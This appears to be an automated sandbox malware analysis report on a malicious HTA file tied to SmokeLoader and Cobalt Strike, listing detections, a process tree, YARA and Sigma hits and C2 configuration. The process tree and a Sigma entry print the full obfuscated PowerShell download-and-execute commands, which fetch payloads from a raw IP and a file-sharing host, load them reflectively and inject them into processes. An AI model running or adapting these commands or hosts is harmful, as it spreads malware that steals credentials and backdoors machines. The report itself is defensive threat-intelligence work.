Edit tour

Windows Analysis Report
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

Overview

General Information

Sample name:	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
Analysis ID:	1557927
MD5:	05dcffe1d8e8e209a90b522192ad8000
SHA1:	77c19b392d39bce4906b5c4e5f1ab0a0c9182dc7
SHA256:	35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected HtmlPhish44

Yara detected Powershell download and execute

Yara detected SmokeLoader

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if browser processes are running

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to compare user and computer (likely to detect sandboxes)

Creates a thread in another existing process (thread injection)

Found evasive API chain (may stop execution after checking mutex)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6736 cmdline: mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 5592 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 6588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 5472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 6964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 6168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

aspnet_compiler.exe (PID: 3636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 796 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 3484 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 5368 cmdline: C:\Windows\system32\WerFault.exe -u -p 3484 -s 724 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

explorer.exe (PID: 692 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 5432 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 3588 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 2164 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

djvbaae (PID: 3052 cmdline: C:\Users\user\AppData\Roaming\djvbaae MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Process Memory Space: powershell.exe PID: 6168	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x68a92:$b2: ::FromBase64String( 0x95b4c:$b2: ::FromBase64String( 0xa3b8e:$b2: ::FromBase64String( 0xa540a:$b2: ::FromBase64String( 0xa5b41:$b2: ::FromBase64String( 0xa6492:$b2: ::FromBase64String( 0xa6b48:$b2: ::FromBase64String( 0xcef:$b3: ::UTF8.GetString( 0x1615:$b3: ::UTF8.GetString( 0x7ba4:$b3: ::UTF8.GetString( 0x84ca:$b3: ::UTF8.GetString( 0x5d154:$b3: ::UTF8.GetString( 0x5da88:$b3: ::UTF8.GetString( 0x68825:$b3: ::UTF8.GetString( 0x69a57:$b3: ::UTF8.GetString( 0x6a393:$b3: ::UTF8.GetString( 0x6aef8:$b3: ::UTF8.GetString( 0x6f5d0:$b3: ::UTF8.GetString( 0x6fef6:$b3: ::UTF8.GetString( 0x765c4:$b3: ::UTF8.GetString( 0x7b4f4:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 5568	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5568	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1d82fe:$b2: ::FromBase64String( 0x1d8996:$b2: ::FromBase64String( 0x771d86:$b2: ::FromBase64String( 0x77241e:$b2: ::FromBase64String( 0x77f587:$b2: ::FromBase64String( 0x77fbac:$b2: ::FromBase64String( 0x7918f9:$b2: ::FromBase64String( 0x792b18:$b2: ::FromBase64String( 0x7948cc:$b2: ::FromBase64String( 0x7cbe4b:$b2: ::FromBase64String( 0x7cc4e3:$b2: ::FromBase64String( 0x7cd679:$b2: ::FromBase64String( 0x806520:$b2: ::FromBase64String( 0x86ce0c:$b2: ::FromBase64String( 0x86dc39:$b2: ::FromBase64String( 0x86f51a:$b2: ::FromBase64String( 0x8ab9e9:$b2: ::FromBase64String( 0x8ac6ce:$b2: ::FromBase64String( 0x9773c9:$b2: ::FromBase64String( 0x977a61:$b2: ::FromBase64String( 0x1d8091:$b3: ::UTF8.GetString(
Process Memory Space: explorer.exe PID: 692	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 5432	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_5568.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

